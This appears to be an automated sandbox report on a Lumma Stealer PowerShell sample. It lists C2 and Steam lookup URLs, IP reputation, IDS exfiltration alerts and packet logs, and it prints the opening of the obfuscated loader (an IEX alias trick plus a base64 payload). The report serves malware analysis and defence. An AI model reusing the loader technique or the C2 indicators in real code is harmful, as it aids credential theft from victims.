                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://store.steampowered.com/legal/RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviERegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1694727177.0000022417DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://misha-lomonosov.com/RegSvcs.exe, 00000002.00000002.1827156834.0000000001498000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1827156834.00000000014BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://misha-lomonosov.com/P7NRegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1694727177.0000022417D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://community.fastly.steamstatic./RegSvcs.exe, 00000002.00000002.1828472967.0000000003782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1694727177.0000022417D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://go.micropowershell.exe, 00000000.00000002.1694727177.00000224171C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://store.steampowered.com/privacy_agreement/RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://misha-lomonosov.com/buABRegSvcs.exe, 00000002.00000002.1827156834.00000000014BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://steamcommunity.com:443/profiles/76561199724331900RegSvcs.exe, 00000002.00000002.1827156834.00000000014A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1717193031.0000022426549000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.valvesoftware.com/legal.hllYRegSvcs.exe, 00000002.00000002.1828060678.0000000001527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://store.steampowered.com/RegSvcs.exe, 00000002.00000002.1828060678.0000000001527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgRegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1694727177.0000022417D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_ARegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.mpowershell.exe, 00000000.00000002.1725389766.000002242E46C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://misha-lomonosov.com/lRegSvcs.exe, 00000002.00000002.1827156834.00000000014DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://misha-lomonosov.com:443/apiRegSvcs.exe, 00000002.00000002.1827156834.00000000014A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://store.steampowered.com/account/cookiepreferences/RegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.1694727177.00000224162C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://oneget.orgpowershell.exe, 00000000.00000002.1694727177.0000022417BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fasRegSvcs.exe, 00000002.00000002.1828060678.0000000001527000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://steamcommunity.com/profiles/76561199724331900/badgesRegSvcs.exe, 00000002.00000002.1828425663.0000000003758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            172.67.160.193
                                                                                            misha-lomonosov.comUnited States
                                                                                            13335CLOUDFLARENETUStrue
                                                                                            104.102.49.254
                                                                                            steamcommunity.comUnited States
                                                                                            16625AKAMAI-ASUSfalse
                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                            Analysis ID:1589406
                                                                                            Start date and time:2025-01-12 09:12:07 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 4m 0s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:6
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:176.113.115.170.ps1
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winPS1@4/5@10/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 50%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 87%
                                                                                            • Number of executed functions: 37
                                                                                            • Number of non-executed functions: 47
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .ps1
                                                                                            • Stop behavior analysis, all processes terminated
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7696 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            TimeTypeDescription
                                                                                            03:12:59API Interceptor8x Sleep call for process: powershell.exe modified
                                                                                            03:13:00API Interceptor9x Sleep call for process: RegSvcs.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                            • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                            http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                            • www.valvesoftware.com/legal.htm
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            steamcommunity.comx.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.102.49.254
                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                            • 104.102.49.254
                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUShttps://accountsupporthub.es/generate/Login/Get hashmaliciousUnknownBrowse
                                                                                            • 104.21.90.106
                                                                                            Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                            • 162.159.134.233
                                                                                            resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                            • 162.159.135.232
                                                                                            Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.219.181
                                                                                            http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                                                            • 104.21.56.69
                                                                                            http://www.telegramstg.com/Get hashmaliciousUnknownBrowse
                                                                                            • 104.21.22.141
                                                                                            http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                                                            • 104.21.1.232
                                                                                            http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                            • 104.17.25.14
                                                                                            http://www.grhga.icu/Get hashmaliciousUnknownBrowse
                                                                                            • 104.21.57.146
                                                                                            http://keystonerelated.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.16.123.96
                                                                                            AKAMAI-ASUShttp://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                                                            • 104.102.22.125
                                                                                            https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 23.212.88.20
                                                                                            x.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 104.102.49.254
                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.102.49.254
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            a0e9f5d64349fb13191bc781f81f42e1Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            x.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.160.193
                                                                                            • 104.102.49.254
                                                                                            No context
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlllulbnolz:NllUc
                                                                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:@...e................................................@..........
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6221
                                                                                            Entropy (8bit):3.730735018874753
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:x3M+33CxHjeMkvhkvCCtek3EO6QjHMp3EO6QjHMS:x3M+yDeI33E1z3E10
                                                                                            MD5:D4DC90E74B6FC4102D31D804D4C03217
                                                                                            SHA1:0A13C86AED78B3798EA1F583FC49307C15659041
                                                                                            SHA-256:8FC7C1012DE1A63D5DA1A5F301CE79037D684C3D95F381276D636E5C75BCCB71
                                                                                            SHA-512:7006B3DFF75870DF9A00D1ABE3EE76E2E94231985D441580B89132BFFAC27EAAC7C01A7A53BB4479B128041C4670B9306B483B94C75C8EF0AC117D6DAED00E9D
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ...-/.v....HW`..d..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....H...d....i..d......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^,Z.A...........................%..A.p.p.D.a.t.a...B.V.1.....,Z.A..Roaming.@......CW.^,Z.A..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^,Z.A..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^,Z.A....Q...........
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):6221
                                                                                            Entropy (8bit):3.730735018874753
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:x3M+33CxHjeMkvhkvCCtek3EO6QjHMp3EO6QjHMS:x3M+yDeI33E1z3E10
                                                                                            MD5:D4DC90E74B6FC4102D31D804D4C03217
                                                                                            SHA1:0A13C86AED78B3798EA1F583FC49307C15659041
                                                                                            SHA-256:8FC7C1012DE1A63D5DA1A5F301CE79037D684C3D95F381276D636E5C75BCCB71
                                                                                            SHA-512:7006B3DFF75870DF9A00D1ABE3EE76E2E94231985D441580B89132BFFAC27EAAC7C01A7A53BB4479B128041C4670B9306B483B94C75C8EF0AC117D6DAED00E9D
                                                                                            Malicious:false
                                                                                            Preview:...................................FL..................F.".. ...-/.v....HW`..d..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....H...d....i..d......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^,Z.A...........................%..A.p.p.D.a.t.a...B.V.1.....,Z.A..Roaming.@......CW.^,Z.A..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^,Z.A..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^,Z.A....Q...........
                                                                                            File type:ASCII text, with very long lines (65478), with CRLF line terminators
                                                                                            Entropy (8bit):5.486554505856197
                                                                                            TrID:
                                                                                              File name:176.113.115.170.ps1
                                                                                              File size:538'493 bytes
                                                                                              MD5:88520295d17f287fd127830bb766712a
                                                                                              SHA1:df16145f1bff600147977f6acd4f931f204bf554
                                                                                              SHA256:3e376b0722ed209898a1b3a93a6988c4ad2f6e35083c07dc9e486e3da55c88ed
                                                                                              SHA512:26993dbe1d417c01f68b687d8f6dbe02977b698215f2e63d1dc5a2f6c80cb18cf5912f593ad988f24953ee8732ddb15d5e65f7dc0412e93a9242028762a7e640
                                                                                              SSDEEP:6144:hkYzSm2MYa1Qdgzkqs5u0uXrRMnfB3sBVy8ZK5HKceYWQLJgvF/9EoQ6GsbwMI5g:srSZ2h7dVI42CoeUJ2z6m20QFqwg2
                                                                                              TLSH:27B47D3140137C5E3BAA2ECE64006EC00C5939A7BB54D150AE899276F2BE53B5F6D9FC
                                                                                              File Content Preview:.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAA
                                                                                              Icon Hash:3270d6baae77db44
                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-01-12T09:13:02.022134+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.102.49.254443TCP
                                                                                              2025-01-12T09:13:02.570846+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449730104.102.49.254443TCP
                                                                                              2025-01-12T09:13:03.168945+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.160.193443TCP
                                                                                              2025-01-12T09:13:03.645814+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731172.67.160.193443TCP
                                                                                              2025-01-12T09:13:03.645814+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.160.193443TCP
                                                                                              2025-01-12T09:13:04.150232+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.160.193443TCP
                                                                                              2025-01-12T09:13:04.600731+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732172.67.160.193443TCP
                                                                                              2025-01-12T09:13:04.600731+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.160.193443TCP
                                                                                              2025-01-12T09:13:05.241985+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.160.193443TCP
                                                                                              2025-01-12T09:13:06.684051+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.160.193443TCP
                                                                                              2025-01-12T09:13:07.273263+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449734172.67.160.193443TCP
                                                                                              2025-01-12T09:13:07.827144+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.160.193443TCP
                                                                                              2025-01-12T09:13:09.588549+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.160.193443TCP
                                                                                              2025-01-12T09:13:10.764737+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.160.193443TCP
                                                                                              2025-01-12T09:13:10.768561+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449737172.67.160.193443TCP
                                                                                              2025-01-12T09:13:13.854856+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.160.193443TCP
                                                                                              2025-01-12T09:13:14.615899+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738172.67.160.193443TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 12, 2025 09:13:01.348078012 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:01.348166943 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.348253012 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:01.351556063 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:01.351593971 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.022057056 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.022134066 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.025186062 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.025201082 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.025624037 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.078149080 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.126996040 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.171325922 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.570931911 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.570991039 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.571011066 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.571052074 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.571070910 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.571063995 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.571141005 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.571181059 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.571181059 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.571181059 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.571217060 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.668112993 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.668164015 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.668190956 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.668211937 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.668241024 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.668262959 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.672724962 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.672787905 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.672817945 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.672867060 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.672882080 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.672949076 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.673001051 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.673767090 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.673799038 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.674096107 CET49730443192.168.2.4104.102.49.254
                                                                                              Jan 12, 2025 09:13:02.674110889 CET44349730104.102.49.254192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.689053059 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:02.689079046 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.689152956 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:02.689402103 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:02.689409971 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.168878078 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.168945074 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.211414099 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.211433887 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.212366104 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.222485065 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.222512007 CET49731443192.168.2.4172.67.160.193
